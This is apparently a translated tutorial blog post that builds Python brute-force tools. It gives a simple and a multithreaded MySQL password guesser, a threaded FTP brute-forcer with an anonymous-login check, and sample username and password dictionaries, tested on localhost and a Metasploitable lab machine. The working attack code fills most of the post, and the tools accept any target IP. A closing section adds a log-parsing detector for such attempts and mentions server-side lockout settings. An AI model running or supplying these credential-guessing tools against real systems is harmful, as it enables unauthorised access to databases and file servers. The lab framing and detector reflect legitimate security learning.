The previous post covered how to build a dictionary with Python. Once we have a dictionary,
we can move on to brute-force tasks. Ready-made tools exist, but you can also write your own,
so next I will build brute-force tools step by step!
Brute-forcing MySQL:
To brute-force MySQL, the target must at least allow remote connections.
I have not enabled remote connections here and only brute-force the local MySQL.
In practice, once you know how to brute-force a local MySQL, doing it against a remote one is just as easy.
The most basic implementation:
```python
# -*-coding:utf-8 -*-
import pymysql

# Hard-coded candidate usernames and passwords; a dictionary file can replace these later
mysql_username = ('root', 'test', 'admin', 'user')
mysql_password = ('', '123456', 'test', 'root', 'admin', 'xuyiqing', 'user')
success = False
host = "127.0.0.1"
port = 3306

# Try every username/password combination in turn
for username in mysql_username:
    for password in mysql_password:
        try:
            db = pymysql.connect(host=host, port=port, user=username, password=password)
            success = True
            if success:
                print("用户名:" + username + " 密码:" + password + " 破解成功")
            db.close()
        except Exception as e:
            print("用户名:" + username + " 密码:" + password + " 破解失败")
```
Fix the usernames and passwords to try, plus the target IP and port, and run it directly.
A more advanced MySQL brute-force script: fairly complete, with multi-threading support
```python
# -*-coding:utf-8 -*-
"""
MySQL brute-force script
Usage:
python MysqlCrack2.py -H [target IP] --u [user dictionary] --p [password dictionary] -P [port]
"""
import re
import socket
import optparse
import threading

try:
    import pymysql
except ImportError:
    print("[!] You need to install pymysql module!")
    print("[!] Usage:pip install pymysql")
    exit()

result_user = None
result_pass = None
threads = []


def main():
    """
    Handle the input arguments
    :return: None
    """
    print("Welcome to MysqlCrack2")
    print("Author: Xuyiqing Version:1.0")
    parse = optparse.OptionParser(
        'python %prog -H <target host> --u <users dictionary> --p <password dictionary> -P <port>')
    parse.add_option('-H', dest="target_host", type="string", help='specify the host')
    parse.add_option('--u', dest='user_dic', type='string', help='specify the dictionary for user')
    parse.add_option('--p', dest='pwd_dic', type='string', help='specify the dictionary for passwords')
    parse.add_option('-P', dest='port', type='int', help='specify the port')
    (options, args) = parse.parse_args()
    target_host = options.target_host
    user_dic = options.user_dic
    pwd_dic = options.pwd_dic
    port = options.port
    # Only accept a dotted IPv4 address as the target
    if target_host is not None and re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', target_host):
        mysql_brute(target_host, user_dic, pwd_dic, port)
    else:
        print("[!] Unknown IP\n")
        exit()


def mysql_brute(host, user_dic, pwd_dic, port):
    """
    MySQL brute force
    :param host: host
    :param user_dic: user dictionary
    :param pwd_dic: password dictionary
    :param port: port
    :return: None
    """
    print("[*] Target:" + host)
    print("[*] Start cracking")
    userlist = None
    pwdlist = None
    try:
        socket.gethostbyname(host)
    except Exception:
        print('[*] Cannot connect to %s' % host)
        exit()
    try:
        # One entry per line in each dictionary file
        with open(user_dic, 'r') as f:
            userlist = [i.strip('\n') for i in f.readlines()]
        with open(pwd_dic, 'r') as f:
            pwdlist = [j.strip('\n') for j in f.readlines()]
        print("[*] Number of users:" + str(len(userlist)))
        print("[*] Number of passwords:" + str(len(pwdlist)))
    except Exception:
        print("[!] The path of the dictionary file is incorrect")
        exit()
    global threads
    # One thread per username/password pair
    for user in userlist:
        for pwd in pwdlist:
            t = threading.Thread(target=mysql_login, args=(host, user, pwd, port))
            t.start()
            threads.append(t)


def mysql_login(host, username, password, port):
    """
    MySQL connection attempt
    :param host: host
    :param username: username
    :param password: password
    :param port: port
    :return: None
    """
    global result_user, result_pass
    try:
        db = pymysql.Connect(host=host, port=port, user=username, password=password)
        print("[+] Success! User:" + username + " Password:" + password + "\n")
        result_user = username
        result_pass = password
        db.close()
    except Exception:
        print("[-] Fail! User:" + username + " Password:" + password + "\n")


if __name__ == '__main__':
    main()
    # Wait for every login thread before reporting the result
    for thread in threads:
        thread.join()
    if result_user is not None and result_pass is not None:
        print("[+] Result: %s - %s" % (result_user, result_pass))
    if result_user is None and result_pass is None:
        print("[-] Crack Fail")
```
Developing an FTP cracking tool:
Installing FTP server software for real is somewhat troublesome, so I use Metasploitable Linux here.
It runs the FTP service by default once booted; my IP here is 192.168.232.129.
The FTP service on Metasploitable Linux allows anonymous login, and one known account/password pair is msfadmin-msfadmin.
```python
# -*-coding:utf-8 -*-
import optparse
import ftplib
import threading
import socket


def anony_login(host):
    """
    FTP anonymous login
    :param host: host
    :return: None
    """
    try:
        ftp = ftplib.FTP()
        ftp.connect(host, 21, timeout=10)
        ftp.login('anonymous', 'test@qq.com')
        ftp.retrlines('LIST')
        ftp.quit()
        print("\n[*] " + str(host) + " FTP Anonymous Login Success")
    except Exception:
        print("\n[-] " + str(host) + " FTP Anonymous Login Fail")


def ftp_login(host, username, password):
    """
    Try to log in to FTP with a username and password
    :param host: host
    :param username: username
    :param password: password
    :return: None
    """
    try:
        print("[-] Trying: " + username + "-" + password + "\n")
        ftp = ftplib.FTP()
        ftp.connect(host, 21, timeout=10)
        ftp.login(username, password)
        ftp.retrlines("LIST")
        ftp.quit()
        print("Success! " + username + " - " + password)
    except ftplib.all_errors:
        pass


def brute_force(host, users_file, pwds_file):
    """
    Brute force
    :param host: host
    :param users_file: user dictionary
    :param pwds_file: password dictionary
    :return: None
    """
    with open(users_file, 'r') as users_f, open(pwds_file, 'r') as pwds_f:
        for user in users_f.readlines():
            pwds_f.seek(0)  # rewind the password file for every user
            for password in pwds_f.readlines():
                username = user.strip('\n')
                password = password.strip('\n')
                t = threading.Thread(target=ftp_login, args=(host, username, password))
                t.start()


def main():
    """
    Main function, handles the input arguments
    :return: None
    """
    parser = optparse.OptionParser('usage: %prog -H <target host> -u <users dictionary> -p <password dictionary>')
    parser.add_option('-H', dest='target_host', type='string', help='specify the host')
    parser.add_option('-u', dest='user_dic', type='string', help='specify the dictionary for user')
    parser.add_option('-p', dest='pwd_dic', type='string', help='specify the dictionary for passwords')
    (options, args) = parser.parse_args()
    host = options.target_host
    user_dic = options.user_dic
    pwd_dic = options.pwd_dic
    try:
        socket.gethostbyname(host)
    except Exception:
        print('[*] Cannot Resolve %s Unknown host' % host)
        exit()
    anony_login(host)
    brute_force(host, user_dic, pwd_dic)


if __name__ == '__main__':
    main()
```
To use it you need two dictionaries, a user dictionary and a password dictionary; I put a few arbitrary entries into them.
username.txt
```text
root
user
admin
msfadmin
manager
```
password.txt
```text
pwd
password
userpass
msfadmin
manager
123456
```
Actual usage: -H the target IP, -u the username dictionary, -p the password dictionary
Result: the anonymous login was already found above, and the figure below shows msfadmin as well, so the crack succeeded.
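Both scripts above leave a recognisable trail on the server. As an added example (not code from the original post), here is a small detector that reads constructed MySQL error-log and vsftpd log lines, counts failed logins per source address, and flags sources that cross a threshold; the log line shapes, addresses and usernames are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not from the post). The MySQL lines follow the
# error-log shape produced with log_error_verbosity=3; the FTP lines follow vsftpd.log.
SAMPLE_LOG = """\
2024-01-01T10:00:01.000000Z 12 [Note] [MY-010926] [Server] Access denied for user 'root'@'192.168.232.1' (using password: YES)
2024-01-01T10:00:01.100000Z 13 [Note] [MY-010926] [Server] Access denied for user 'test'@'192.168.232.1' (using password: YES)
2024-01-01T10:00:01.200000Z 14 [Note] [MY-010926] [Server] Access denied for user 'admin'@'192.168.232.1' (using password: NO)
2024-01-01T10:00:01.300000Z 15 [Note] [MY-010926] [Server] Access denied for user 'user'@'192.168.232.1' (using password: YES)
2024-01-01T10:05:00.000000Z 16 [Note] [MY-010926] [Server] Access denied for user 'root'@'10.0.0.7' (using password: YES)
Mon Jan  1 10:01:01 2024 [pid 2001] [root] FAIL LOGIN: Client "192.168.232.1"
Mon Jan  1 10:01:01 2024 [pid 2002] [user] FAIL LOGIN: Client "192.168.232.1"
Mon Jan  1 10:01:02 2024 [pid 2003] [admin] FAIL LOGIN: Client "192.168.232.1"
Mon Jan  1 10:01:02 2024 [pid 2004] [msfadmin] OK LOGIN: Client "192.168.232.1"
"""

# MySQL error log: Access denied for user 'USER'@'HOST' (using password: YES|NO)
MYSQL_DENIED = re.compile(r"Access denied for user '([^']*)'@'([^']*)'")
# vsftpd.log: [USER] FAIL LOGIN: Client "IP"
VSFTPD_FAIL = re.compile(r'\[([^\]]+)\] FAIL LOGIN: Client "([^"]+)"')


def parse_failures(log_text):
    """Yield (service, source_ip, username) for every failed-login line."""
    for line in log_text.splitlines():
        m = MYSQL_DENIED.search(line)
        if m:
            yield ("mysql", m.group(2), m.group(1))
            continue
        m = VSFTPD_FAIL.search(line)
        if m:
            yield ("ftp", m.group(2), m.group(1))


def find_bruteforcers(log_text, threshold=3):
    """Return {(service, source_ip): (failure_count, sorted distinct usernames)} for
    every source with at least `threshold` failures. Many distinct usernames from one
    source is what separates a dictionary run from one user mistyping a password."""
    failures = defaultdict(list)
    for service, ip, user in parse_failures(log_text):
        failures[(service, ip)].append(user)
    return {key: (len(users), sorted(set(users)))
            for key, users in failures.items() if len(users) >= threshold}


if __name__ == "__main__":
    for (service, ip), (count, users) in find_bruteforcers(SAMPLE_LOG).items():
        print("%s: %d failed logins from %s, usernames tried: %s" % (service, count, ip, ", ".join(users)))
```

On the server side, MySQL's CONNECTION_CONTROL plugin delays responses after repeated failed attempts and vsftpd's max_login_fails drops the session after a few, so a detector like this complements those limits rather than replacing them.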